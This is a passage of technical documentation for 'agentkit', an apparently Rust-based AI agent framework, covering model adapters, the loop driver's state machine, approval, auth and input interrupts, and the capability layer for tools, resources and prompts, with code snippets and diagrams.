  • Stateless HTTP providers (OpenAI, OpenRouter, Groq): start_session creates a lightweight handle holding a copy of the config. begin_turn sends the full transcript as an HTTP POST. next_event reads SSE chunks from the response.

  • Stateful session providers (WebSocket-based, real-time APIs): start_session opens a persistent connection. begin_turn sends a delta or continuation message (not the full transcript). next_event reads frames from the live connection. Session cleanup happens on drop.

The loop doesn’t care which pattern the adapter uses. It calls the same trait methods either way.

Stateless adapter (HTTP):

  Adapter ──start_session──▶ Session (just holds config)
                                │
                                ├──begin_turn──▶ POST /v1/chat/completions
                                │                      │
                                │                Turn ◀┘ (SSE stream handle)
                                │                  │
                                │                  ├── next_event() → Delta
                                │                  ├── next_event() → Delta
                                │                  ├── next_event() → Finished
                                │                  └── next_event() → None
                                │
                                ├──begin_turn──▶ POST /v1/chat/completions
                                │
                                ...


Stateful adapter (WebSocket):

  Adapter ──start_session──▶ Session (owns WebSocket connection)
                                │
                                ├──begin_turn──▶ send continuation frame
                                │                      │
                                │                Turn ◀┘ (reads from same socket)
                                │                  │
                                │                  ├── next_event() → Delta
                                │                  └── next_event() → Finished
                                │
                                ├──begin_turn──▶ send next frame
                                ...

ModelTurnEvent

The model turn emits a stream of normalized events:

#![allow(unused)]
fn main() {
pub enum ModelTurnEvent {
    Delta(Delta),
    ToolCall(ToolCallPart),
    Usage(Usage),
    Finished(ModelTurnResult),
}
}

The adapter is responsible for converting provider-native wire formats into these normalized events. This is where the translation happens — the loop never sees provider-specific response shapes.

The events have a natural ordering within a turn:

Turn event timeline:

  ──────────────────────────────────────────────────────────▶ time

  Delta(BeginPart)
  Delta(AppendText)  ─┐
  Delta(AppendText)   │  streaming text
  Delta(AppendText)  ─┘
  Delta(CommitPart)

  ToolCall(ToolCallPart)    ← fully assembled tool call
  ToolCall(ToolCallPart)    ← another tool call (if parallel)

  Usage(Usage)              ← token counts

  Finished(ModelTurnResult) ← always last

Finished always comes last. Usage typically comes just before Finished but some providers interleave it with deltas. ToolCall events represent fully assembled tool calls — the adapter has already accumulated the streaming chunks internally.

ModelTurnResult

#![allow(unused)]
fn main() {
pub struct ModelTurnResult {
    pub finish_reason: FinishReason,
    pub output_items: Vec<Item>,
    pub usage: Option<Usage>,
    pub metadata: MetadataMap,
}
}

The output_items field carries the complete assistant response as transcript items. The loop appends these directly to the transcript. finish_reason tells the loop what to do next — execute tool calls, return to the host, or handle an error.

TurnRequest

The loop constructs a TurnRequest containing everything the adapter needs:

#![allow(unused)]
fn main() {
pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

The loop owns TurnRequest construction. The host doesn’t rebuild model-facing state manually each turn. The transcript field contains the full conversation so far — system prompt, context items, user messages, assistant responses, tool results. For stateless providers, this is sent in every request. For stateful providers, the adapter decides what subset to send.

available_tools contains the tool specifications from the registry. The adapter converts these into the provider’s tool schema format (typically { "type": "function", "function": { ... } }).

metadata is a pass-through for per-turn options. The host can set provider-specific parameters here without the loop needing to understand them.

cache is the normalized prompt caching request for the turn. The adapter maps it into provider-native controls or explicit cache headers. That mapping is covered in Chapter 15.

Cancellation threading

Both begin_turn and next_event accept an Option<TurnCancellation>. The loop creates a checkpoint at the start of each turn and passes it through:

Host calls controller.interrupt()
         │
         ▼
  CancellationController bumps generation (0 → 1)
         │
         ├──▶ TurnCancellation in begin_turn()
         │    checkpoint.is_cancelled() → true
         │    adapter can abort the HTTP request
         │
         └──▶ TurnCancellation in next_event()
              checkpoint.is_cancelled() → true
              adapter can stop reading the SSE stream

The adapter should check cancellation at natural yield points — before sending an HTTP request, between SSE chunks, or in a tokio::select! race. When cancelled, return Err(LoopError::Cancelled) and the loop handles the rest.

The normalization contract

The adapter has one critical responsibility: produce correct normalized types. The loop’s behaviour depends on these guarantees:

GuaranteeWhat happens if violated
Finished is emitted exactly once, as the last eventLoop hangs or processes stale events
FinishReason::ToolCall when tool calls are presentLoop ignores tool calls, returns text-only
ToolCallPart has a unique, non-empty idTool results can’t be correlated; model sees wrong results
ToolCallPart.input is valid JSONTool receives unparseable input, returns an error
Usage token counts are accurateCompaction triggers fire at wrong times; cost reporting is wrong
Delta sequences follow BeginPart → Append* → CommitPartReporter renders garbage; buffer state is inconsistent

These are not enforced at the type level — the adapter must get them right. This is the most important surface to test when implementing a new provider.

Testing the contract

Write tests that verify each guarantee in isolation:

  1. Send a simple text prompt → assert Delta sequence ends with CommitPart and Finished
  2. Send a prompt that triggers tool calls → assert ToolCall events have valid IDs and JSON input
  3. Send a prompt that hits the token limit → assert FinishReason::MaxTokens
  4. Cancel mid-stream → assert the adapter returns LoopError::Cancelled cleanly
  5. Verify Usage token counts are non-zero and plausible

Mock the HTTP layer or use a local test server. Don’t test against live provider APIs in CI — they’re slow, flaky, and cost money.

Runtime independence

agentkit-loop is runtime-agnostic — it depends on async traits, not on tokio directly. The model adapter traits use async_trait and require only Send, not any runtime-specific bounds.

In practice, most adapters use tokio for HTTP clients (reqwest) and SSE parsing. But the loop crate itself can run on any executor — tokio, async-std, or a custom runtime. This is a deliberate architectural choice: the core loop is portable, while runtime-specific concerns live in leaf crates (provider adapters, task managers).

The futures-timer crate is used for the cancellation polling delay instead of tokio::time, keeping the core free of runtime dependencies.

Example: openrouter-chat shows a minimal adapter in action — one model, one session, one turn, rendered to stdout.

Crate: The adapter traits are defined in agentkit-loop. Provider adapters live in agentkit-provider-* crates.

Driving the loop

This chapter walks through the LoopDriver — the runtime heart of the agent. We’ll trace a complete turn from input submission through model invocation, tool execution, and final result.

The driver API

The LoopDriver is generic over the model session type:

#![allow(unused)]
fn main() {
pub struct LoopDriver<S: ModelSession> {
    session_id: SessionId,
    session: Option<S>,
    tool_executor: Arc<BasicToolExecutor>,
    task_manager: Arc<dyn TaskManager>,
    permissions: Arc<dyn PermissionChecker>,
    resources: Arc<dyn ToolResources>,
    cancellation: Option<CancellationHandle>,
    compaction: Option<CompactionConfig>,
    observers: Vec<Box<dyn LoopObserver>>,
    transcript: Vec<Item>,
    pending_input: Vec<Item>,
    pending_approvals: BTreeMap<ToolCallId, PendingApprovalToolCall>,
    pending_auth: Option<PendingAuthToolCall>,
    active_tool_round: Option<ActiveToolRound>,
    next_turn_index: u64,
}
}

The public API is narrow:

#![allow(unused)]
fn main() {
impl<S: ModelSession> LoopDriver<S> {
    pub fn submit_input(&mut self, input: Vec<Item>) -> Result<(), LoopError>;
    pub fn resolve_approval_for(&mut self, call_id: ToolCallId, decision: ApprovalDecision)
        -> Result<(), LoopError>;
    pub fn resolve_auth(&mut self, resolution: AuthResolution) -> Result<(), LoopError>;
    pub async fn next(&mut self) -> Result<LoopStep, LoopError>;
    pub fn snapshot(&self) -> LoopSnapshot;
}
}

The host code is a simple loop:

#![allow(unused)]
fn main() {
driver.submit_input(vec![system_item, user_item])?;

loop {
    match driver.next().await? {
        LoopStep::Interrupt(interrupt) => handle_interrupt(interrupt),
        LoopStep::Finished(result) => break,
    }
}
}

State machine semantics

next() is the only async method. It advances the driver through its internal state machine until it hits a yield point — either a finished turn or an interrupt. There is no polling, no callback registration, and no event queue to drain.

Driver state machine:

                submit_input()
                      │
                      ▼
  ┌─────────────────────────────────┐
  │         Has pending input?      │
  │                                 │
  │  yes ──▶ merge into transcript  │
  │  no  ──▶ AwaitingInput         ─┼──▶ Interrupt
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │      Compaction trigger?        │
  │                                 │
  │  yes ──▶ run compaction pipeline│
  │  no  ──▶ skip                   │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │      Model turn                 │
  │                                 │
  │  stream events from model       │
  │  collect tool calls             │
  │  emit AgentEvents to observers  │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │      Tool calls present?        │
  │                                 │
  │  no  ──▶ Finished(TurnResult)  ─┼──▶ return
  │  yes ──▶ permission preflight   │
  └─────────────┬───────────────────┘
                │
                ▼
  ┌─────────────────────────────────┐
  │    Any require approval?        │
  │                                 │
  │  yes ──▶ ApprovalRequest       ─┼──▶ Interrupt
  │  no  ──▶ execute tools          │
  └─────────────┬───────────────────┘
                │
                ▼
       append tool results
                │
                ▼
       go to "Model turn" ◀─── automatic tool roundtrip

The host cannot call next() twice without resolving an outstanding interrupt — that’s a state error. This is intentional. The driver forces the host to deal with interrupts before proceeding. You can’t accidentally ignore an approval request.

Anatomy of a turn

Here’s what happens inside next(), step by step:

1. Merge input

Pending items (submitted via submit_input()) are appended to the working transcript. The driver emits AgentEvent::InputAccepted to observers.

Before:
  transcript: [System, Context, User("hello"), Assistant("Hi!")]
  pending:    [User("Read main.rs")]

After merge:
  transcript: [System, Context, User("hello"), Assistant("Hi!"), User("Read main.rs")]
  pending:    []

2. Check compaction

If a CompactionConfig is set, the trigger evaluates the transcript. If it fires, the strategy pipeline transforms the transcript before the model sees it:

Before compaction (18 items, trigger threshold: 12):
  [System, Context, User, Asst, Tool, User, Asst, Tool, Tool, User, Asst, Tool, User, Asst, Tool, User, Asst, Tool]

After compaction (keep recent 8 + preserve System/Context):
  [System, Context, User, Asst, Tool, User, Asst, Tool]
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                    most recent 8 non-preserved items

Compaction happens before the model turn, not after. The model always sees the post-compaction transcript.

3. Construct TurnRequest

The loop builds a TurnRequest from the working transcript and tool registry:

#![allow(unused)]
fn main() {
TurnRequest {
    session_id: self.session_id.clone(),
    turn_id: TurnId::new(format!("turn-{}", self.next_turn_index)),
    transcript: self.transcript.clone(),
    available_tools: self.tool_executor.specs(),
    metadata: MetadataMap::new(),
    cache: self.next_turn_cache.take().or_else(|| self.default_cache.clone()),
}
}

4. Start model turn

session.begin_turn(request, cancellation) sends the transcript to the provider and returns a streaming turn handle.

5. Stream model output

The driver polls turn.next_event() in a loop:

Loop:
  next_event() ──▶ Some(Delta(BeginPart))       ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(Delta(AppendText))      ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(Delta(CommitPart))      ──▶ emit ContentDelta to observers
  next_event() ──▶ Some(ToolCall(ToolCallPart)) ──▶ collect for execution
  next_event() ──▶ Some(Usage(Usage))           ──▶ emit UsageUpdated to observers
  next_event() ──▶ Some(Finished(result))       ──▶ break

6. Execute tools

If the model requested tool calls (indicated by FinishReason::ToolCall):

  1. The driver constructs a ToolRequest for each ToolCallPart
  2. Each request goes through the task manager for scheduling
  3. The task manager routes each tool call (foreground, background, or foreground-then-detach)
  4. The executor runs permission preflight on each tool
  5. If any tool requires approval → the driver surfaces LoopStep::Interrupt(ApprovalRequest)
  6. If any tool requires auth → the driver surfaces LoopStep::Interrupt(AuthRequest)
  7. Otherwise → tools execute and results are appended to the transcript as ToolResultParts

7. Tool roundtrip

If tools were executed, the driver starts another model turn automatically (back to step 3). The model sees the tool results and may request more tools or produce a final response.

8. Return result

When the model finishes without pending tool calls, the driver returns:

#![allow(unused)]
fn main() {
LoopStep::Finished(TurnResult {
    turn_id,
    finish_reason: FinishReason::Completed,
    items: /* assistant items from this turn */,
    usage: /* accumulated usage */,
    metadata: MetadataMap::new(),
})
}

Multiple tool roundtrips per user turn

A single user message can trigger many tool roundtrips:

User: "Add error handling to src/parser.rs"

  Turn 1: model → ToolCall(fs.read_file)
          execute → result appended
  Turn 2: model → ToolCall(fs.replace_in_file)
          execute → result appended
  Turn 3: model → ToolCall(shell.exec("cargo check"))
          execute → result appended
  Turn 4: model → Text("I've added error handling...")
          no tool calls → Finished

Host sees: one call to next(), one TurnResult with all items.

From the host’s perspective, this is one call to next() that returns one TurnResult containing all items produced across all internal turns. This is a critical feature for coding agents — the model must be able to chain tool calls without returning control to the host after each one.

Event delivery during a turn

While the driver processes a turn, non-blocking events are delivered to observers synchronously:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}
}

The full event taxonomy:

EventWhen it fires
RunStartedAgent::start() completes
TurnStartedBefore each model turn begins
InputAcceptedsubmit_input() is called
ContentDelta(Delta)Model streams a delta
ToolCallRequestedModel requests a tool call
ApprovalRequiredA tool requires approval
AuthRequiredA tool requires auth
ApprovalResolvedAn approval interrupt is resolved
AuthResolvedAn auth interrupt is resolved
CompactionStartedCompaction trigger fires
CompactionFinishedCompaction pipeline completes
UsageUpdated(Usage)Token usage reported
Warning(String)Non-fatal issue (recovered tool error, etc.)
RunFailed(String)Unrecoverable error
TurnFinished(TurnResult)A turn completes

Observers are called inline, synchronously, in registration order. The loop task blocks briefly for each observer call. This is acceptable because observers should be fast — write to stderr, increment a counter, append to a buffer. Expensive processing should happen asynchronously behind a channel adapter.

Building the agent

The Agent is built with a builder:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)                          // required
    .tools(registry)                         // default: empty
    .permissions(checker)                    // default: allow all
    .resources(resources)                    // default: ()
    .task_manager(manager)                   // default: SimpleTaskManager
    .cancellation(cancellation_handle)       // default: none
    .compaction(config)                      // default: none
    .observer(reporter)                      // default: none
    .build()?;

let mut driver = agent.start(session_config).await?;
}

The builder validates that a model adapter is set. Everything else has sensible defaults:

FieldDefaultEffect
toolsempty ToolRegistryModel can’t call any tools
permissionsAllowAllPermissionsEvery tool call is auto-approved
resources()No shared resources
task_managerSimpleTaskManagerSequential, inline tool execution
cancellationNoneNo cancellation support
compactionNoneTranscript grows without bounds
observers[]No event reporting

Agent::start() consumes the agent and returns a LoopDriver. The agent’s immutable configuration (adapter, tools, permissions) is moved into the driver. Multiple drivers can be created from the same Agent type by cloning it first.

Snapshots

The driver exposes a read-only snapshot for inspection or persistence:

#![allow(unused)]
fn main() {
let snapshot: LoopSnapshot = driver.snapshot();
// snapshot.session_id, snapshot.transcript, snapshot.pending_input
}

This is useful for debugging (inspect the transcript mid-session), persistence (serialize and resume later), and testing (assert on transcript state).

Cancellation

If the host connects a CancellationHandle (e.g. wired to a Ctrl-C handler), the driver creates TurnCancellation checkpoints and passes them to model turns and tool executions:

Host wires Ctrl-C:

  ctrlc::set_handler(move || controller.interrupt());

Driver flow:

  1. checkpoint = cancellation.checkpoint()
  2. session.begin_turn(request, Some(checkpoint.clone()))
  3. turn.next_event(Some(checkpoint.clone()))
     └── if cancelled → LoopError::Cancelled
  4. tool.invoke(request, ctx)  // ctx.cancellation = Some(checkpoint)
     └── if cancelled → ToolError::Cancelled

When cancellation fires, the current turn ends with FinishReason::Cancelled. The driver adds metadata (agentkit.interrupted: true, agentkit.interrupt_reason: "user_cancelled") to the turn result so the host can distinguish cancellation from normal completion.

Example: openrouter-coding-agent demonstrates a driver executing filesystem tool calls across multiple roundtrips in a single turn.

Crate: agentkit-loop — the Agent, AgentBuilder, LoopDriver, LoopStep, TurnResult, and LoopSnapshot types.

Interrupts and control flow

The loop runs autonomously until it hits something that requires a human decision. These blocking points are interrupts. This chapter covers how interrupts work, why they exist, and how hosts resolve them.

The interrupt model

#![allow(unused)]
fn main() {
pub enum LoopStep {
    Interrupt(LoopInterrupt),
    Finished(TurnResult),
}

pub enum LoopInterrupt {
    ApprovalRequest(PendingApproval),
    AuthRequest(PendingAuth),
    AwaitingInput(InputRequest),
}
}

Each interrupt type represents a different reason the loop cannot proceed without host intervention. The variants carry handle types (PendingApproval, PendingAuth, InputRequest) with ergonomic resolution methods, so hosts can resolve the interrupt directly on the handle rather than reaching back into the driver.

Loop autonomy boundary:

  ┌──────────────────────────────────────────────────────┐
  │                Autonomous zone                       │
  │                                                      │
  │   model turn → stream deltas → collect tool calls    │
  │   permission check → tool execution → append result  │
  │   compaction → next model turn → ...                 │
  │                                                      │
  │   The loop runs here without host involvement.       │
  └──────────────────────────┬───────────────────────────┘
                             │
                    yield point (interrupt)
                             │
  ┌──────────────────────────▼───────────────────────────┐
  │                Host decision zone                    │
  │                                                      │
  │   "Approve this shell command?"                      │
  │   "Enter your GitHub OAuth token"                    │
  │   "Type your next message"                           │
  │                                                      │
  │   The host handles this, then calls next() again.    │
  └──────────────────────────────────────────────────────┘

Approval interrupts

When a tool’s permission policy returns RequireApproval, the loop pauses and surfaces the request:

#![allow(unused)]
fn main() {
pub struct ApprovalRequest {
    pub task_id: Option<TaskId>,
    pub call_id: Option<ToolCallId>,
    pub id: ApprovalId,
    pub request_kind: String,      // e.g. "filesystem.write", "shell.command"
    pub reason: ApprovalReason,
    pub summary: String,
    pub metadata: MetadataMap,
}
}

The reason field tells the host why approval is needed:

#![allow(unused)]
fn main() {
pub enum ApprovalReason {
    PolicyRequiresConfirmation,   // Policy always requires approval for this kind
    EscalatedRisk,                // Operation flagged as higher risk than usual
    UnknownTarget,                // Target not recognised by any policy
    SensitivePath,                // Filesystem path outside the allowed set
    SensitiveCommand,             // Shell command not in the allow-list
    SensitiveServer,              // MCP server not in the trusted set
    SensitiveAuthScope,           // MCP auth scope not pre-approved
}
}

The host resolves using the PendingApproval handle:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
        println!("Tool needs approval: {}", pending.request.summary);

        // Option 1: approve
        pending.approve(&mut driver)?;

        // Option 2: deny
        pending.deny(&mut driver)?;

        // Option 3: deny with reason (fed back to model)
        pending.deny_with_reason(&mut driver, "User declined")?;
    }
    ...
}
}

After resolution, the host calls next() again. If approved, the tool executes and the turn continues. If denied, the denial is reported back to the model as a tool error — the model sees the denial reason and can adjust its approach.

The approval flow in detail

1. Model emits ToolCall(fs.replace_in_file, { path: "/etc/hosts", ... })
                          │
2. Executor runs permission preflight
   └── PathPolicy: /etc/hosts is outside workspace → RequireApproval(SensitivePath)
                          │
3. Driver emits AgentEvent::ApprovalRequired to observers (for UI/logging)
                          │
4. Driver returns LoopStep::Interrupt(ApprovalRequest(PendingApproval { ... }))
                          │
                   ─── host decision ───
                          │
5a. host calls pending.approve(driver)
    └── tool executes → result appended → loop resumes
                    OR
5b. host calls pending.deny(driver)
    └── denial sent to model as ToolResultPart { is_error: true, output: "Permission denied: ..." }
    └── model sees the error and may try a different approach

Multiple pending approvals

When the model requests several tool calls in a single turn, some may require approval while others don’t. The driver surfaces one approval at a time, in the order the model emitted them:

Model response: [ToolCall("fs.write", ...), ToolCall("shell.exec", ...), ToolCall("fs.read", ...)]

Permission check:
  fs.write     → RequireApproval (outside workspace)
  shell.exec   → RequireApproval (unknown command)
  fs.read      → Allow

next() → Interrupt(ApprovalRequest for fs.write)
  host approves
next() → Interrupt(ApprovalRequest for shell.exec)
  host denies
next() → tools execute (fs.write runs, shell.exec denied, fs.read runs)
       → results appended, loop continues

The driver tracks pending approvals in a BTreeMap<ToolCallId, PendingApprovalToolCall> with a VecDeque for ordering. Each approval is surfaced individually, but they belong to the same tool round — the driver only starts tool execution once all pending approvals are resolved.

Why interrupts, not callbacks

An alternative design would pass a callback or channel into the tool executor. agentkit uses interrupts instead because:

  1. Explicit control flow — the host’s main loop always knows what state the driver is in. There’s no hidden state machine running in the background.
  2. No hidden concurrency — approval doesn’t happen on a background thread while the loop keeps running. The loop is genuinely paused.
  3. Testability — interrupt-based flows are easy to test: submit input, call next(), assert you get the expected interrupt, resolve it, call next() again. No mocking of async channels.
  4. Serializable state — an interrupted driver can be snapshotted and resumed later, because the interrupt carries all state needed for resolution.
Callback model (rejected):

  loop calls tool → tool calls approval_callback → callback calls host code
  └── Who owns the stack? Can the host do async work? What if the host panics?
      What if multiple tools need approval concurrently?

Interrupt model (adopted):

  loop calls tool → tool needs approval → loop returns Interrupt to host
  └── Host owns the stack. Host does whatever it needs. Calls next() when ready.

Auth interrupts

MCP servers and external tools may require authentication. Auth interrupts follow the same pattern:

#![allow(unused)]
fn main() {
pub struct AuthRequest {
    pub task_id: Option<TaskId>,
    pub id: String,
    pub provider: String,           // e.g. "github", "google"
    pub operation: AuthOperation,   // what triggered the auth
    pub challenge: MetadataMap,     // OAuth URLs, scopes, etc.
}
}

The AuthOperation enum describes what triggered the auth requirement:

#![allow(unused)]
fn main() {
pub enum AuthOperation {
    ToolCall { tool_name, input, ... },
    McpConnect { server_id, ... },
    McpToolCall { server_id, tool_name, input, ... },
    McpResourceRead { server_id, resource_id, ... },
    McpPromptGet { server_id, prompt_id, args, ... },
    Custom { kind, payload, ... },
}
}

The host resolves using the PendingAuth handle:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Interrupt(LoopInterrupt::AuthRequest(pending)) => {
        println!("Auth required from: {}", pending.request.provider);

        // Option 1: provide credentials
        let mut creds = MetadataMap::new();
        creds.insert("token".into(), json!("ghp_..."));
        pending.provide(&mut driver, creds)?;

        // Option 2: cancel
        pending.cancel(&mut driver)?;
    }
    ...
}
}

Input interrupts

When the model finishes a turn and the loop has no pending input, it returns AwaitingInput:

#![allow(unused)]
fn main() {
pub struct InputRequest {
    pub session_id: SessionId,
    pub reason: String,
}
}

The host reads the next user message and submits it:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::AwaitingInput(pending)) => {
    let user_message = read_line()?;
    pending.submit(&mut driver, vec![user_item(user_message)])?;
}
}

This is the most common interrupt in an interactive session. The pattern is: model finishes → host gets AwaitingInput → host reads user input → host calls submit → host calls next() → loop runs another turn.

Interrupt ordering and state safety

The driver enforces strict state transitions:

Valid transitions:

  submit_input() ──▶ next() ──▶ Finished
                               ──▶ Interrupt(Approval) ──▶ resolve_approval() ──▶ next()
                               ──▶ Interrupt(Auth)     ──▶ resolve_auth()     ──▶ next()
                               ──▶ Interrupt(Awaiting) ──▶ submit_input()     ──▶ next()

Invalid (state errors):

  next() while an approval is pending                    → LoopError::InvalidState
  resolve_approval() with no pending approval            → LoopError::InvalidState
  resolve_approval() for a ToolCallId that doesn't exist → LoopError::InvalidState

These constraints prevent subtle bugs where the host accidentally skips or duplicates an interrupt resolution. The cost is that the host must handle interrupts immediately, but this matches the reality that an unanswered approval request means the agent genuinely cannot proceed.

The event/interrupt duality

Some actions are reported both as non-blocking observations and as blocking interrupts:

Observer receivesHost receives
AgentEvent::ApprovalRequired(req)LoopStep::Interrupt(ApprovalRequest(pending))
AgentEvent::AuthRequired(req)LoopStep::Interrupt(AuthRequest(pending))
AgentEvent::TurnFinished(result)LoopStep::Finished(result)

This duplication is intentional. The event is for observability — a reporter logs it, a UI updates a status indicator. The interrupt is for control flow — the host must answer it before the loop can continue. These are different concerns served by different mechanisms.

A reporter that displays “Waiting for approval…” needs the event. The host code that prompts the user needs the interrupt. Neither should have to reach into the other’s channel.

Practical patterns

Auto-approve by policy

If your permission policy already knows which operations are safe, it returns Allow instead of RequireApproval. The loop never interrupts for those operations. Configure your policies conservatively and expand allowlists as you build confidence.

Session-scoped approvals

A host can maintain a session-local allowlist. When the user approves a command like cargo build, add it to the allowlist. On subsequent approval interrupts, check the allowlist before prompting:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
    if session_allowlist.contains(&pending.request.request_kind) {
        pending.approve(&mut driver)?;
    } else {
        let decision = prompt_user(&pending.request)?;
        if decision == "always" {
            session_allowlist.insert(pending.request.request_kind.clone());
        }
        // resolve based on decision
    }
}
}

Headless operation

For non-interactive agents (CI, background jobs), either configure permissive policies or auto-approve everything:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
    pending.approve(&mut driver)?;
}
}

The approval system still runs — it’s just that the policy answers “yes” to everything. The events are still emitted, so audit logging captures every approved operation.

Example: openrouter-coding-agent handles approval interrupts for filesystem writes in its main loop.

Crate: agentkit-loopLoopStep, LoopInterrupt, PendingApproval, PendingAuth, InputRequest. Approval types come from agentkit-tools-core.

The capability layer

Before we discuss tools, we need to understand the abstraction they build on. agentkit-capabilities defines a lower-level interoperability layer for anything a model can interact with: operations it can invoke, data it can read, and prompt templates it can use.

Why a layer beneath tools

The current design has three external capability shapes:

  • Invocables — named request/response operations (tools, MCP tools, custom operations)
  • Resources — named data blobs that can be listed and read (files, database rows, API responses)
  • Prompts — parameterized templates that produce conversation items

Native tools and MCP tools are both invocable operations. But MCP also exposes resources and prompts, which are not tools. Forcing everything through a Tool trait would distort the model — reading a resource is not a tool call, and rendering a prompt template is not tool execution.

Without a capability layer:

  Tool trait ◀── native tools
             ◀── MCP tools (fit naturally)
             ◀── MCP resources (forced into tool shape — read_resource "tool")
             ◀── MCP prompts (forced into tool shape — render_prompt "tool")

  Everything is a tool. But reading a resource has no side effects,
  no permission model, and no schema. Wrapping it as a "tool" adds
  complexity without adding value.


With a capability layer:

  Invocable  ◀── native tools (via Tool → Invocable bridge)
             ◀── MCP tools (via McpToolAdapter)

  ResourceProvider ◀── MCP resources
                   ◀── custom data sources

  PromptProvider   ◀── MCP prompts
                   ◀── custom template engines

  Each shape gets the right abstraction. No forced fitting.

The capability layer gives MCP, tools, and future integrations one shared vocabulary without pretending everything is the same thing.

Invocable

The core trait for anything the model can call:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Invocable: Send + Sync {
    fn spec(&self) -> &InvocableSpec;
    async fn invoke(
        &self,
        request: InvocableRequest,
        ctx: &mut CapabilityContext<'_>,
    ) -> Result<InvocableResult, CapabilityError>;
}
}

An InvocableSpec carries the name, description, and JSON Schema for the input — enough information to present the capability to a model:

#![allow(unused)]
fn main() {
pub struct InvocableSpec {
    pub name: CapabilityName,
    pub description: String,
    pub input_schema: Value,       // JSON Schema object
    pub metadata: MetadataMap,
}
}

The request carries the model’s input arguments plus session context:

#![allow(unused)]
fn main() {
pub struct InvocableRequest {
    pub input: Value,
    pub session_id: Option<SessionId>,
    pub turn_id: Option<TurnId>,
    pub metadata: MetadataMap,
}
}

And the result supports multiple return shapes:

#![allow(unused)]
fn main() {
pub struct InvocableResult {
    pub output: InvocableOutput,
    pub metadata: MetadataMap,
}

pub enum InvocableOutput {
    Text(String),             // Plain text response
    Structured(Value),        // JSON value
    Items(Vec<Item>),         // Conversation items (for prompts, multi-part results)
    Data(DataRef),            // Binary or referenced data
}
}

Invocable vs Tool

Invocable is deliberately thinner than Tool:

InvocableTool
spec: InvocableSpecspec: ToolSpec (adds annotations)
invoke(request, CapabilityContext)invoke(request, ToolContext)
proposed_requests() (preflight)
ToolAnnotations (read_only, destructive, …)
ToolContext (permissions, resources, cancellation)

An Invocable knows its name, description, schema, and how to execute. A Tool adds permission semantics, behavioural hints, and a richer execution context. Tools are invocables with opinions about safety.

Resources and prompts

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ResourceProvider: Send + Sync {
    async fn list_resources(&self) -> Result<Vec<ResourceDescriptor>, CapabilityError>;
    async fn read_resource(&self, id: &ResourceId, ctx: &mut CapabilityContext<'_>)
        -> Result<ResourceContents, CapabilityError>;
}
}

Resources are named data blobs. They have an ID, a name, an optional description and MIME type. Reading them returns a DataRef — the content might be inline text, inline bytes, or a URI:

#![allow(unused)]
fn main() {
pub struct ResourceDescriptor {
    pub id: ResourceId,
    pub name: String,
    pub description: Option<String>,
    pub mime_type: Option<String>,
    pub metadata: MetadataMap,
}

pub struct ResourceContents {
    pub data: DataRef,
    pub metadata: MetadataMap,
}
}

Prompts are parameterized templates that produce conversation items:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait PromptProvider: Send + Sync {
    async fn list_prompts(&self) -> Result<Vec<PromptDescriptor>, CapabilityError>;
    async fn get_prompt(&self, id: &PromptId, args: Value, ctx: &mut CapabilityContext<'_>)
        -> Result<PromptContents, CapabilityError>;
}
}

A prompt descriptor carries a JSON Schema for its arguments:

#![allow(unused)]
fn main() {
pub struct PromptDescriptor {
    pub id: PromptId,
    pub name: String,
    pub description: Option<String>,
    pub input_schema: Value,
    pub metadata: MetadataMap,
}

pub struct PromptContents {
    pub items: Vec<Item>, // Rendered conversation items
    pub metadata: MetadataMap,
}
}

These are separate traits, not specializations of Invocable. The type system enforces the distinction — you can’t accidentally pass a ResourceProvider where an Invocable is expected.

Capability typeModel interactionSide effectsPermission model
InvocableModel calls itMay haveFull tool permissions
ResourceProviderHost reads, injectsRead-onlySimpler (list + read)
PromptProviderHost renders, injectsNoneNone (templates only)

CapabilityProvider

Many integrations expose multiple capability kinds. The CapabilityProvider trait bundles them:

#![allow(unused)]
fn main() {
pub trait CapabilityProvider: Send + Sync {
    fn invocables(&self) -> Vec<Arc<dyn Invocable>>;
    fn resources(&self) -> Vec<Arc<dyn ResourceProvider>>;
    fn prompts(&self) -> Vec<Arc<dyn PromptProvider>>;
}
}

An MCP server implements CapabilityProvider to expose its tools, resources, and prompts through one registration point:

MCP server "github"
  │
  ├── invocables:  [search_issues, create_pr, merge_pr]
  ├── resources:   [repo_readme, issue_list, pr_diff]
  └── prompts:     [code_review_prompt, bug_report_template]
       │
       ▼
  CapabilityProvider::invocables()  → Vec<Arc<dyn Invocable>>
  CapabilityProvider::resources()   → Vec<Arc<dyn ResourceProvider>>
  CapabilityProvider::prompts()     → Vec<Arc<dyn PromptProvider>>

The loop collects all capability providers and merges their invocables into the unified tool list presented to the model. Resources and prompts flow through separate paths — they’re typically consumed by the context loader or the host, not directly by the model.

CapabilityContext

#![allow(unused)]
fn main() {
pub struct CapabilityContext<'a> {
    pub session_id: Option<&'a SessionId>,
    pub turn_id: Option<&'a TurnId>,
    pub metadata: &'a MetadataMap,
}
}

This is a minimal context passed to all capability invocations. It carries enough to correlate work with a session and turn, but not enough to reach into the loop or modify the transcript.

The tool layer wraps this in a richer ToolContext that adds permission checking, shared resources, and cancellation:

CapabilityContext (lean)ToolContext (rich)
session_idcapability: CapabilityContext
turn_idpermissions: &dyn PermissionChecker
metadataresources: &dyn ToolResources
